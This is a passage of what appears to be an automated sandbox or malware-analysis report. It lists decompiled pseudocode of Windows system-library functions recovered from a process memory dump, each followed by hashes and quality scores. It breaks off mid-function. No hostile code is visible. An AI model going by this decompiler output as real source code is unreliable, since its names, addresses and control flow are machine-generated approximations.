                                                              				intOrPtr* _t52;
                                                              				intOrPtr* _t55;
                                                              				signed int _t57;
                                                              				intOrPtr* _t59;
                                                              				intOrPtr _t68;
                                                              				intOrPtr* _t77;
                                                              				void* _t79;
                                                              				signed int _t80;
                                                              				intOrPtr _t81;
                                                              				char* _t82;
                                                              				void* _t83;
                                                              
                                                              				_push(0x24);
                                                              				_push(0x10c0220);
                                                              				E0103D08C(__ebx, __edi, __esi);
                                                              				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                                                              				_t79 = __ecx;
                                                              				_t35 =  *0x10d7b9c; // 0x0
                                                              				_t55 = L01004620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                                                              				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                                                              				if(_t55 == 0) {
                                                              					_t39 = 0xc0000017;
                                                              					L11:
                                                              					return E0103D0D1(_t39);
                                                              				}
                                                              				_t68 = 0;
                                                              				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                                                              				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                                                              				_t7 = _t55 + 8; // 0x8
                                                              				_t57 = 6;
                                                              				memcpy(_t7, _t79, _t57 << 2);
                                                              				_t80 = 0xfffffffe;
                                                              				 *(_t83 - 4) = _t80;
                                                              				if(0 < 0) {
                                                              					L14:
                                                              					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                              					L20:
                                                              					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                                                              					_t39 = _t81;
                                                              					goto L11;
                                                              				}
                                                              				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                                                              					_t81 = 0xc000007b;
                                                              					goto L20;
                                                              				}
                                                              				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                                                              					_t59 =  *((intOrPtr*)(_t83 + 8));
                                                              					_t45 =  *_t59;
                                                              					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                                                              					 *_t59 = _t45 + 1;
                                                              					L6:
                                                              					 *(_t83 - 4) = 1;
                                                              					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                                                              					 *(_t83 - 4) = _t80;
                                                              					if(_t68 < 0) {
                                                              						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                                                              						if(_t82 == 0) {
                                                              							goto L14;
                                                              						}
                                                              						asm("btr eax, ecx");
                                                              						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                                                              						if( *_t82 != 0) {
                                                              							 *0x10d7b10 =  *0x10d7b10 - 8;
                                                              						}
                                                              						goto L20;
                                                              					}
                                                              					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                                                              					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                                                              					_t51 =  *0x10d536c; // 0x77f05368
                                                              					if( *_t51 != 0x10d5368) {
                                                              						_push(3);
                                                              						asm("int 0x29");
                                                              						goto L14;
                                                              					}
                                                              					 *_t55 = 0x10d5368;
                                                              					 *((intOrPtr*)(_t55 + 4)) = _t51;
                                                              					 *_t51 = _t55;
                                                              					 *0x10d536c = _t55;
                                                              					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                                                              					if(_t52 != 0) {
                                                              						 *_t52 = _t55;
                                                              					}
                                                              					_t39 = 0;
                                                              					goto L11;
                                                              				}
                                                              				_t77 =  *((intOrPtr*)(_t83 + 8));
                                                              				_t68 = E0101A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                                                              				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                                                              				if(_t68 < 0) {
                                                              					goto L14;
                                                              				}
                                                              				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                                                              				goto L6;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 30e6c4b739601c1dce04b21dc84208c656601159dc4a80e59f06d3a9d77aa523
                                                              • Instruction ID: fe8ea8d1d4674ae0cd2b9a227da359f98484023bb3d39ed91b9b6810f767214e
                                                              • Opcode Fuzzy Hash: 30e6c4b739601c1dce04b21dc84208c656601159dc4a80e59f06d3a9d77aa523
                                                              • Instruction Fuzzy Hash: FA418CB5A01345DFDB15CF58C990B9DBBF1BB89314F1880A9ED84AB348C779A901CF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 68%
                                                              			E0100C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                                                              				signed int* _v8;
                                                              				char _v16;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				signed char _t33;
                                                              				signed char _t43;
                                                              				signed char _t48;
                                                              				signed char _t62;
                                                              				void* _t63;
                                                              				intOrPtr _t69;
                                                              				intOrPtr _t71;
                                                              				unsigned int* _t82;
                                                              				void* _t83;
                                                              
                                                              				_t80 = __ecx;
                                                              				_t82 = __edx;
                                                              				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                                                              				_t62 = _t33 >> 0x00000001 & 0x00000001;
                                                              				if((_t33 & 0x00000001) != 0) {
                                                              					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                                                              					if(E01007D50() != 0) {
                                                              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                              					} else {
                                                              						_t43 = 0x7ffe0386;
                                                              					}
                                                              					if( *_t43 != 0) {
                                                              						_t43 = E010B8D34(_v8, _t80);
                                                              					}
                                                              					E01002280(_t43, _t82);
                                                              					if( *((char*)(_t80 + 0xdc)) == 0) {
                                                              						E00FFFFB0(_t62, _t80, _t82);
                                                              						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                                                              						_t30 = _t80 + 0xd0; // 0xd0
                                                              						_t83 = _t30;
                                                              						E010B8833(_t83,  &_v16);
                                                              						_t81 = _t80 + 0x90;
                                                              						E00FFFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                                                              						_t63 = 0;
                                                              						_push(0);
                                                              						_push(_t83);
                                                              						_t48 = E0102B180();
                                                              						if(_a4 != 0) {
                                                              							E01002280(_t48, _t81);
                                                              						}
                                                              					} else {
                                                              						_t69 = _v8;
                                                              						_t12 = _t80 + 0x98; // 0x98
                                                              						_t13 = _t69 + 0xc; // 0x575651ff
                                                              						E0100BB2D(_t13, _t12);
                                                              						_t71 = _v8;
                                                              						_t15 = _t80 + 0xb0; // 0xb0
                                                              						_t16 = _t71 + 8; // 0x8b000cc2
                                                              						E0100BB2D(_t16, _t15);
                                                              						E0100B944(_v8, _t62);
                                                              						 *((char*)(_t80 + 0xdc)) = 0;
                                                              						E00FFFFB0(0, _t80, _t82);
                                                              						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                                                              						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                                                              						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                                                              						 *(_t80 + 0xde) = 0;
                                                              						if(_a4 == 0) {
                                                              							_t25 = _t80 + 0x90; // 0x90
                                                              							E00FFFFB0(0, _t80, _t25);
                                                              						}
                                                              						_t63 = 1;
                                                              					}
                                                              					return _t63;
                                                              				}
                                                              				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                                                              				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                                                              				if(_a4 == 0) {
                                                              					_t24 = _t80 + 0x90; // 0x90
                                                              					E00FFFFB0(0, __ecx, _t24);
                                                              				}
                                                              				return 0;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                              • Instruction ID: c26e20538dcbde8ff22756922e8953888e959a948f1cca51f0d4abf5a6cd7d80
                                                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                              • Instruction Fuzzy Hash: AB31487160194BBFF746EBB4C980BF9FB94BF52200F0442AAD59C47391DB386A09D7A0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 76%
                                                              			E01067016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                                                              				signed int _v8;
                                                              				char _v588;
                                                              				intOrPtr _v592;
                                                              				intOrPtr _v596;
                                                              				signed short* _v600;
                                                              				char _v604;
                                                              				short _v606;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed short* _t55;
                                                              				void* _t56;
                                                              				signed short* _t58;
                                                              				signed char* _t61;
                                                              				char* _t68;
                                                              				void* _t69;
                                                              				void* _t71;
                                                              				void* _t72;
                                                              				signed int _t75;
                                                              
                                                              				_t64 = __edx;
                                                              				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                                                              				_v8 =  *0x10dd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                                                              				_t55 = _a16;
                                                              				_v606 = __ecx;
                                                              				_t71 = 0;
                                                              				_t58 = _a12;
                                                              				_v596 = __edx;
                                                              				_v600 = _t58;
                                                              				_t68 =  &_v588;
                                                              				if(_t58 != 0) {
                                                              					_t71 = ( *_t58 & 0x0000ffff) + 2;
                                                              					if(_t55 != 0) {
                                                              						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                                                              					}
                                                              				}
                                                              				_t8 = _t71 + 0x2a; // 0x28
                                                              				_t33 = _t8;
                                                              				_v592 = _t8;
                                                              				if(_t71 <= 0x214) {
                                                              					L6:
                                                              					 *((short*)(_t68 + 6)) = _v606;
                                                              					if(_t64 != 0xffffffff) {
                                                              						asm("cdq");
                                                              						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                                                              						 *((char*)(_t68 + 0x28)) = _a4;
                                                              						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                                                              						 *((char*)(_t68 + 0x29)) = _a8;
                                                              						if(_t71 != 0) {
                                                              							_t22 = _t68 + 0x2a; // 0x2a
                                                              							_t64 = _t22;
                                                              							E01066B4C(_t58, _t22, _t71,  &_v604);
                                                              							if(_t55 != 0) {
                                                              								_t25 = _v604 + 0x2a; // 0x2a
                                                              								_t64 = _t25 + _t68;
                                                              								E01066B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                                                              							}
                                                              							if(E01007D50() == 0) {
                                                              								_t61 = 0x7ffe0384;
                                                              							} else {
                                                              								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                                              							}
                                                              							_push(_t68);
                                                              							_push(_v592 + 0xffffffe0);
                                                              							_push(0x402);
                                                              							_push( *_t61 & 0x000000ff);
                                                              							E01029AE0();
                                                              						}
                                                              					}
                                                              					_t35 =  &_v588;
                                                              					if( &_v588 != _t68) {
                                                              						_t35 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                                                              					}
                                                              					L16:
                                                              					_pop(_t69);
                                                              					_pop(_t72);
                                                              					_pop(_t56);
                                                              					return E0102B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                                                              				}
                                                              				_t68 = L01004620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                                                              				if(_t68 == 0) {
                                                              					goto L16;
                                                              				} else {
                                                              					_t58 = _v600;
                                                              					_t64 = _v596;
                                                              					goto L6;
                                                              				}
                                                              			}























                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9109a9185182ad67120fc196d1e1d5d27ea3affbf188efa19051862d873a4312
                                                              • Instruction ID: b58cef6bbd76acff8785b5b0540616ec446b48c9d5642c1751bd273b59171d65
                                                              • Opcode Fuzzy Hash: 9109a9185182ad67120fc196d1e1d5d27ea3affbf188efa19051862d873a4312
                                                              • Instruction Fuzzy Hash: F531C272604751DBD321DF2CC940AAAB7E9BF88704F044A69F9D58B691E730E904C7A6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 92%
                                                              			E0101A70E(intOrPtr* __ecx, char* __edx) {
                                                              				unsigned int _v8;
                                                              				intOrPtr* _v12;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t16;
                                                              				intOrPtr _t17;
                                                              				intOrPtr _t28;
                                                              				char* _t33;
                                                              				intOrPtr _t37;
                                                              				intOrPtr _t38;
                                                              				void* _t50;
                                                              				intOrPtr _t52;
                                                              
                                                              				_push(__ecx);
                                                              				_push(__ecx);
                                                              				_t52 =  *0x10d7b10; // 0x0
                                                              				_t33 = __edx;
                                                              				_t48 = __ecx;
                                                              				_v12 = __ecx;
                                                              				if(_t52 == 0) {
                                                              					 *0x10d7b10 = 8;
                                                              					 *0x10d7b14 = 0x10d7b0c;
                                                              					 *0x10d7b18 = 1;
                                                              					L6:
                                                              					_t2 = _t52 + 1; // 0x1
                                                              					E0101A990(0x10d7b10, _t2, 7);
                                                              					asm("bts ecx, eax");
                                                              					 *_t48 = _t52;
                                                              					 *_t33 = 1;
                                                              					L3:
                                                              					_t16 = 0;
                                                              					L4:
                                                              					return _t16;
                                                              				}
                                                              				_t17 = L0101A840(__edx, __ecx, __ecx, _t52, 0x10d7b10, 1, 0);
                                                              				if(_t17 == 0xffffffff) {
                                                              					_t37 =  *0x10d7b10; // 0x0
                                                              					_t3 = _t37 + 0x27; // 0x27
                                                              					__eflags = _t3 >> 5 -  *0x10d7b18; // 0x0
                                                              					if(__eflags > 0) {
                                                              						_t38 =  *0x10d7b9c; // 0x0
                                                              						_t4 = _t52 + 0x27; // 0x27
                                                              						_v8 = _t4 >> 5;
                                                              						_t50 = L01004620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                                                              						__eflags = _t50;
                                                              						if(_t50 == 0) {
                                                              							_t16 = 0xc0000017;
                                                              							goto L4;
                                                              						}
                                                              						 *0x10d7b18 = _v8;
                                                              						_t8 = _t52 + 7; // 0x7
                                                              						E0102F3E0(_t50,  *0x10d7b14, _t8 >> 3);
                                                              						_t28 =  *0x10d7b14; // 0x0
                                                              						__eflags = _t28 - 0x10d7b0c;
                                                              						if(_t28 != 0x10d7b0c) {
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                                              						}
                                                              						_t9 = _t52 + 8; // 0x8
                                                              						 *0x10d7b14 = _t50;
                                                              						_t48 = _v12;
                                                              						 *0x10d7b10 = _t9;
                                                              						goto L6;
                                                              					}
                                                              					 *0x10d7b10 = _t37 + 8;
                                                              					goto L6;
                                                              				}
                                                              				 *__ecx = _t17;
                                                              				 *_t33 = 0;
                                                              				goto L3;
                                                              			}

















                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 74a389a92d18add4b91cd1746e1be937e5778f48a264f81c28192e3d4483d4a4
                                                              • Instruction ID: bad714e623974b98ef79ce6ce50b9ee49dcdc84baa2e51e5f2b13f94578f233a
                                                              • Opcode Fuzzy Hash: 74a389a92d18add4b91cd1746e1be937e5778f48a264f81c28192e3d4483d4a4
                                                              • Instruction Fuzzy Hash: 0931C2B1702341DBD721CB08DC90F6A77F9FB84728F94095AEEC587248D37A9A01CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 97%
                                                              			E010161A0(signed int* __ecx) {
                                                              				intOrPtr _v8;
                                                              				char _v12;
                                                              				intOrPtr* _v16;
                                                              				intOrPtr _v20;
                                                              				intOrPtr _t30;
                                                              				intOrPtr _t31;
                                                              				void* _t32;
                                                              				intOrPtr _t33;
                                                              				intOrPtr _t37;
                                                              				intOrPtr _t49;
                                                              				signed int _t51;
                                                              				intOrPtr _t52;
                                                              				signed int _t54;
                                                              				void* _t59;
                                                              				signed int* _t61;
                                                              				intOrPtr* _t64;
                                                              
                                                              				_t61 = __ecx;
                                                              				_v12 = 0;
                                                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                                                              				_v16 = __ecx;
                                                              				_v8 = 0;
                                                              				if(_t30 == 0) {
                                                              					L6:
                                                              					_t31 = 0;
                                                              					L7:
                                                              					return _t31;
                                                              				}
                                                              				_t32 = _t30 + 0x5d8;
                                                              				if(_t32 == 0) {
                                                              					goto L6;
                                                              				}
                                                              				_t59 = _t32 + 0x30;
                                                              				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                                                              					goto L6;
                                                              				}
                                                              				if(__ecx != 0) {
                                                              					 *((intOrPtr*)(__ecx)) = 0;
                                                              					 *((intOrPtr*)(__ecx + 4)) = 0;
                                                              				}
                                                              				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                                                              					_t51 =  *(_t32 + 0x10);
                                                              					_t33 = _t32 + 0x10;
                                                              					_v20 = _t33;
                                                              					_t54 =  *(_t33 + 4);
                                                              					if((_t51 | _t54) == 0) {
                                                              						_t37 = E01015E50(0xfc67cc, 0, 0,  &_v12);
                                                              						if(_t37 != 0) {
                                                              							goto L6;
                                                              						}
                                                              						_t52 = _v8;
                                                              						asm("lock cmpxchg8b [esi]");
                                                              						_t64 = _v16;
                                                              						_t49 = _t37;
                                                              						_v20 = 0;
                                                              						if(_t37 == 0) {
                                                              							if(_t64 != 0) {
                                                              								 *_t64 = _v12;
                                                              								 *((intOrPtr*)(_t64 + 4)) = _t52;
                                                              							}
                                                              							E010B9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                                                              							_t31 = 1;
                                                              							goto L7;
                                                              						}
                                                              						E00FEF7C0(_t52, _v12, _t52, 0);
                                                              						if(_t64 != 0) {
                                                              							 *_t64 = _t49;
                                                              							 *((intOrPtr*)(_t64 + 4)) = _v20;
                                                              						}
                                                              						L12:
                                                              						_t31 = 1;
                                                              						goto L7;
                                                              					}
                                                              					if(_t61 != 0) {
                                                              						 *_t61 = _t51;
                                                              						_t61[1] = _t54;
                                                              					}
                                                              					goto L12;
                                                              				} else {
                                                              					goto L6;
                                                              				}
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a57797c4e7d46a1f54b3aca1040791b26eeb0817d68fe2cf14143fc21aaf7d3f
                                                              • Instruction ID: 7317f0f9f0794864f00dcbdc53caa66220302297967f410a1706f9d650ea52f2
                                                              • Opcode Fuzzy Hash: a57797c4e7d46a1f54b3aca1040791b26eeb0817d68fe2cf14143fc21aaf7d3f
                                                              • Instruction Fuzzy Hash: AD316B716057018FE3A0CF1DC940B6ABBE5FB88B00F4949ADE9D89B251E7B5D804CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 95%
                                                              			E00FEAA16(signed short* __ecx) {
                                                              				signed int _v8;
                                                              				intOrPtr _v12;
                                                              				signed short _v16;
                                                              				intOrPtr _v20;
                                                              				signed short _v24;
                                                              				signed short _v28;
                                                              				void* _v32;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr _t25;
                                                              				signed short _t38;
                                                              				signed short* _t42;
                                                              				signed int _t44;
                                                              				signed short* _t52;
                                                              				signed short _t53;
                                                              				signed int _t54;
                                                              
                                                              				_v8 =  *0x10dd360 ^ _t54;
                                                              				_t42 = __ecx;
                                                              				_t44 =  *__ecx & 0x0000ffff;
                                                              				_t52 =  &(__ecx[2]);
                                                              				_t51 = _t44 + 2;
                                                              				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                                                              					L4:
                                                              					_t25 =  *0x10d7b9c; // 0x0
                                                              					_t53 = L01004620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                                                              					__eflags = _t53;
                                                              					if(_t53 == 0) {
                                                              						L3:
                                                              						return E0102B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                                                              					} else {
                                                              						E0102F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                                                              						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                                                              						L2:
                                                              						_t51 = 4;
                                                              						if(L00FF6C59(_t53, _t51, _t58) != 0) {
                                                              							_t28 = E01015E50(0xfcc338, 0, 0,  &_v32);
                                                              							__eflags = _t28;
                                                              							if(_t28 == 0) {
                                                              								_t38 = ( *_t42 & 0x0000ffff) + 2;
                                                              								__eflags = _t38;
                                                              								_v24 = _t53;
                                                              								_v16 = _t38;
                                                              								_v20 = 0;
                                                              								_v12 = 0;
                                                              								E0101B230(_v32, _v28, 0xfcc2d8, 1,  &_v24);
                                                              								_t28 = E00FEF7A0(_v32, _v28);
                                                              							}
                                                              							__eflags = _t53 -  *_t52;
                                                              							if(_t53 !=  *_t52) {
                                                              								_t28 = L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                              							}
                                                              						}
                                                              						goto L3;
                                                              					}
                                                              				}
                                                              				_t53 =  *_t52;
                                                              				_t44 = _t44 >> 1;
                                                              				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                                                              				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                                                              					goto L4;
                                                              				}
                                                              				goto L2;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5d4ae14ccaf6cc9e8e02569d83b9f2d8f71d6e203b8295589da62b4be1fdc49
                                                              • Instruction ID: 6f5f34788097e072b70d13a2b426675bf6cbc9edd5cf2651ee69d016496d354c
                                                              • Opcode Fuzzy Hash: c5d4ae14ccaf6cc9e8e02569d83b9f2d8f71d6e203b8295589da62b4be1fdc49
                                                              • Instruction Fuzzy Hash: 1C31E571A0061AEBCB119F65CD81ABFB7B8FF44B00F014469F945D7150EB78AD11DBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 58%
                                                              			E01024A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                              				signed int _v8;
                                                              				signed int* _v12;
                                                              				char _v13;
                                                              				signed int _v16;
                                                              				char _v21;
                                                              				signed int* _v24;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t29;
                                                              				signed int* _t32;
                                                              				signed int* _t41;
                                                              				signed int _t42;
                                                              				void* _t43;
                                                              				intOrPtr* _t51;
                                                              				void* _t52;
                                                              				signed int _t53;
                                                              				signed int _t58;
                                                              				void* _t59;
                                                              				signed int _t60;
                                                              				signed int _t62;
                                                              
                                                              				_t49 = __edx;
                                                              				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                              				_t26 =  *0x10dd360 ^ _t62;
                                                              				_v8 =  *0x10dd360 ^ _t62;
                                                              				_t41 = __ecx;
                                                              				_t51 = __edx;
                                                              				_v12 = __ecx;
                                                              				if(_a4 == 0) {
                                                              					if(_a8 != 0) {
                                                              						goto L1;
                                                              					}
                                                              					_v13 = 1;
                                                              					E01002280(_t26, 0x10d8608);
                                                              					_t58 =  *_t41;
                                                              					if(_t58 == 0) {
                                                              						L11:
                                                              						E00FFFFB0(_t41, _t51, 0x10d8608);
                                                              						L2:
                                                              						 *0x10db1e0(_a4, _a8);
                                                              						_t42 =  *_t51();
                                                              						if(_t42 == 0) {
                                                              							_t29 = 0;
                                                              							L5:
                                                              							_pop(_t52);
                                                              							_pop(_t59);
                                                              							_pop(_t43);
                                                              							return E0102B640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                              						}
                                                              						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                              						if(_v21 != 0) {
                                                              							_t53 = 0;
                                                              							E01002280(_t28, 0x10d8608);
                                                              							_t32 = _v24;
                                                              							if( *_t32 == _t58) {
                                                              								 *_t32 = _t42;
                                                              								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                              								if(_t58 != 0) {
                                                              									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                              									asm("sbb edi, edi");
                                                              									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                              								}
                                                              							}
                                                              							E00FFFFB0(_t42, _t53, 0x10d8608);
                                                              							if(_t53 != 0) {
                                                              								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                              							}
                                                              						}
                                                              						_t29 = _t42;
                                                              						goto L5;
                                                              					}
                                                              					if( *((char*)(_t58 + 0x40)) != 0) {
                                                              						L10:
                                                              						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                              						E00FFFFB0(_t41, _t51, 0x10d8608);
                                                              						_t29 = _t58;
                                                              						goto L5;
                                                              					}
                                                              					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                              					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                              						goto L11;
                                                              					}
                                                              					goto L10;
                                                              				}
                                                              				L1:
                                                              				_v13 = 0;
                                                              				_t58 = 0;
                                                              				goto L2;
                                                              			}

                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d6881e3135d85c3b28320a878ccd71a451ee12d5f02319d108707dbfcd5a2d9b
                                                              • Instruction ID: e971bcbf50148c84edaaae6ef89f991b99b00fcc204e7454d5a7b7dbe3256a6b
                                                              • Opcode Fuzzy Hash: d6881e3135d85c3b28320a878ccd71a451ee12d5f02319d108707dbfcd5a2d9b
                                                              • Instruction Fuzzy Hash: C4313532202321DBD762DF59C944B2BBBE4FF85710F4045ADE9D68B291CB74D804CB85
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 93%
                                                              			E01028EC7(void* __ecx, void* __edx) {
                                                              				signed int _v8;
                                                              				signed int* _v16;
                                                              				intOrPtr _v20;
                                                              				signed int* _v24;
                                                              				char* _v28;
                                                              				signed int* _v32;
                                                              				intOrPtr _v36;
                                                              				signed int* _v40;
                                                              				signed int* _v44;
                                                              				signed int* _v48;
                                                              				intOrPtr _v52;
                                                              				signed int* _v56;
                                                              				signed int* _v60;
                                                              				signed int* _v64;
                                                              				intOrPtr _v68;
                                                              				signed int* _v72;
                                                              				char* _v76;
                                                              				signed int* _v80;
                                                              				signed int _v84;
                                                              				signed int* _v88;
                                                              				intOrPtr _v92;
                                                              				signed int* _v96;
                                                              				intOrPtr _v100;
                                                              				signed int* _v104;
                                                              				signed int* _v108;
                                                              				char _v140;
                                                              				signed int _v144;
                                                              				signed int _v148;
                                                              				signed int* _v152;
                                                              				char _v156;
                                                              				signed int* _v160;
                                                              				char _v164;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* _t67;
                                                              				intOrPtr _t70;
                                                              				void* _t71;
                                                              				void* _t72;
                                                              				signed int _t73;
                                                              
                                                              				_t69 = __edx;
                                                              				_v8 =  *0x10dd360 ^ _t73;
                                                              				_t48 =  *[fs:0x30];
                                                              				_t72 = __edx;
                                                              				_t71 = __ecx;
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x18)) != 0) {
                                                              					_t48 = E01014E70(0x10d86e4, 0x1029490, 0, 0);
                                                              					if( *0x10d53e8 > 5 && E01028F33(0x10d53e8, 0, 0x2000) != 0) {
                                                              						_v156 =  *((intOrPtr*)(_t71 + 0x44));
                                                              						_v144 =  *(_t72 + 0x44) & 0x0000ffff;
                                                              						_v148 =  *(_t72 + 0x46) & 0x0000ffff;
                                                              						_v164 =  *((intOrPtr*)(_t72 + 0x58));
                                                              						_v108 =  &_v84;
                                                              						_v92 =  *((intOrPtr*)(_t71 + 0x28));
                                                              						_v84 =  *(_t71 + 0x24) & 0x0000ffff;
                                                              						_v76 =  &_v156;
                                                              						_t70 = 8;
                                                              						_v60 =  &_v144;
                                                              						_t67 = 4;
                                                              						_v44 =  &_v148;
                                                              						_v152 = 0;
                                                              						_v160 = 0;
                                                              						_v104 = 0;
                                                              						_v100 = 2;
                                                              						_v96 = 0;
                                                              						_v88 = 0;
                                                              						_v80 = 0;
                                                              						_v72 = 0;
                                                              						_v68 = _t70;
                                                              						_v64 = 0;
                                                              						_v56 = 0;
                                                              						_v52 = 0x10d53e8;
                                                              						_v48 = 0;
                                                              						_v40 = 0;
                                                              						_v36 = 0x10d53e8;
